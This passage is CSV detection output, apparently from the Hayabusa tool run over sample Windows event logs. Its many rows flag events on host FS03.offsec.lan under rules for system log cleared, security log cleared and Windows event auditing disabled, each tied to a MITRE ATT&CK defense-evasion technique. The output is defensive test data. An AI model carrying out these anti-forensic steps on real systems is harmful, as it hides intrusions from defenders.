admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx 2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 2021-10-26 03:30:36.515 